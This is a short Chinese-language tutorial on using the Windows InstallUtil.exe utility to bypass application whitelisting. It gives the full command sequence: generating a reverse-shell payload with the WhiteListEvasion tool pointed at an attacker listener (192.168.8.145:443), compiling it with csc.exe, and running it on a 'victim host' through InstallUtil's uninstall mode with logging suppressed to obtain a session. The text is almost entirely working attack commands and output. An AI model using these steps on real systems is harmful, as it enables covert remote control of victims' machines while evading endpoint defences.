InstallUtil
InstallUtil.exe是一个命令行工具,它可以用来安装和卸载服务器资源,如Windows服务、消息队列、事件日志等。它与System.Configuration.Install命名空间中的类配合使用,执行程序集中的安装程序组件。
要利用它,我们首先需要使用 WhiteListEvasion 生成Payload:
python InstallUtil.py --cs_file temp.cs --exe_file temp.exe --payload windowsreverse_shell_tcp --lhost 192.168.8.145 --lport 443然后将cs文件编译为exe:
PS C:\Windows\Microsoft.NET\Framework\v4.0.30319> .\csc.exe C:\experiments\installUtil\temp.cs将exe文件发送到受害者主机并运行以下命令即可获取到会话:
PS C:\Windows\Microsoft.NET\Framework\v4.0.30319> .\InstallUtil.exe /logfile= /LogToConsole=false /U C:\Windows\Microsoft.NET\Framework\v4.0.30319\temp.exe
Microsoft (R) .NET Framework Installation utility Version 4.0.30319.17929
Copyright (C) Microsoft Corporation. All rights reserved.
Hello From Uninstall...I carry out the real work...